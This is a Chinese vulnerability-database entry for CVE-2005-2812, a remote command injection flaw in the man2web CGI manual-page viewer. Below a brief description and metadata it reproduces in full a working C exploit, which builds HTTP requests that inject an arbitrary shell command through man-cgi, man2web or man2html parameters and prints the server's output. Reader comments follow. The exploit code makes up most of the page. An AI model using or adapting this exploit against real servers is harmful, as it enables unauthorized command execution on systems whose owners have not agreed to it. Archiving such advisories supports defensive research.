man2web远程命令执行漏洞
漏洞ID | 1109052 | 漏洞类型 | 输入验证 |
发布时间 | 2005-09-04 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2005-2812 |
CNNVD-ID | CNNVD-200509-048 |
漏洞平台 | CGI | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
man2web是一种在Web页面上显示手册页的软件。man2web在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。man2web的多个脚本没有正确过滤请求中可能包含的恶意数据而直接用来构造调用Shell的命令,攻击者通过嵌入shell命令来获取执行。
|漏洞EXP
/*
* str0ke@server:~$ ./test some.edu "w" /cgi-bin/man2web 80 1
* /str0ke
*/
/* dl-mancgi.c v0.2
* x86/linux multipie man2web cgi-scripts remote command spawn
* found and coded by tracewar (darklogic team)
* for educaional purposes only.
*****************************************************************
* greetz goes to:
* matan peretz, ofer shaked, setuid, alex, majestic
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
void usage(char *argv0) {
fprintf(stderr, "x86/linux multipie man2web cgi-scripts remote command spawnn");
fprintf(stderr, "researched by tracewarn");
fprintf(stderr, "targets: n0=man-cgin1=man2webn2=man2htmlnn");
fprintf(stderr, "usage: %s <remote_host> <command> <path> <http server port> <target>n", argv0);
fprintf(stderr, "example:");
fprintf(stderr, " %s 1.2.3.4 w /cgi-bin/man-cgi 80 0n",argv0);
exit(0);
}
int main(int argc, char **argv) {
int sock, i, j, len = 0;
struct sockaddr_in serv_addr;
struct hostent *crap;
char *cp, dummy[50000], buffer[2000] = "GET ";
if(argc < 6)
usage(argv[0]);
if(atoi(argv[5]) == 0) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?-P ");
strcat(dummy, argv[2]);
strcat(dummy, " ls");}
else if(atoi(argv[5]) == 1) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?program=-P ");
strcat(dummy, argv[2]);
strcat(dummy, " ls");}
else if(atoi(argv[5]) == 2) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?section=-P");
strcat(dummy, argv[2]);
strcat(dummy, "&topic=w");}
else
usage(argv[0]);
printf("# crafting buffer string ... ");
for(i=0, j=4;i < strlen(dummy);i++) {
if(dummy[i] == ' ') {
strcat(buffer, "%20");
j+=3;}
else {
buffer[j] = dummy[i];
j++;}
}
strcat(buffer, "rn");
printf("(done)n");
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0)
return printf("# error creating socket.n");
crap = gethostbyname(argv[1]);
if(crap == NULL)
return printf("# cant resolve the specified hostname: %sn", argv[1]);
else
printf("# connecting to victim... ");
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(atoi(argv[4]));
bcopy((char *)crap->h_addr, (char *)&serv_addr.sin_addr.s_addr, crap->h_length);
if (connect(sock, &serv_addr, sizeof(serv_addr)) < 0)
return printf("(error)n# check again %s:%dn", argv[1], atoi(argv[3]));
printf("(done)n# sending crafted string... ");
if( (send(sock, buffer, strlen(buffer), 0)) == -1 )
return printf("n# error while sending the crafted string.!n");
printf("(done)n# waiting for our call ...n");
memset(buffer, 0x00, 2000);
memset(dummy, 0x00, 50000);
printf("nn");
while(recv(sock, buffer, 2000, 0) > 0)
strcat(dummy, buffer);
cp = &dummy[0];
i = 0; j = 0;
len = strlen(dummy);
if(atoi(argv[5]) == 0) {
while(strncmp(cp, "<hr>", 4) && i < len) {
cp++;
i++;
}
cp+=4;
while(strncmp(cp, "<hr>", 4) && strncmp(cp, "<A", 2) && j < len) {
j++;
cp++;
}
*cp = ' ';
cp = &dummy[0] + i + 4;
}
else if(atoi(argv[5]) == 1) {
while(strncmp(cp, "<pre>", 5) && i < len) {
cp++;
i++;
}
cp+=4;
while(strncmp(cp, "pre", 3) && j < len) {
j++;
cp++;
}
*cp = ' ';
cp = &dummy[0] + i + 6;
}
else if(atoi(argv[5]) == 2) {
while(strncmp(cp, "PRE", 3) && i < len) {
cp++;
i++;
}
cp+=2;
while(strncmp(cp, "PRE", 3) && j < len) {
j++;
cp++;
}
*cp = ' ';
cp = &dummy[0] + i + 2;
}
if(*cp == ' ')
return printf("# Bad response from the server.n");
printf("%s", cp);
printf("nn");
close(sock);
return 0;
}
// milw0rm.com [2005-09-04]
|参考资料
来源:BID
名称:14747
链接:http://www.securityfocus.com/bid/14747
相关推荐: jmcce Predictable Log File Symbolic Link Attack Vulnerability
jmcce Predictable Log File Symbolic Link Attack Vulnerability 漏洞ID 1102545 漏洞类型 Race Condition Error 发布时间 2002-01-22 更新时间 2002-01-…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666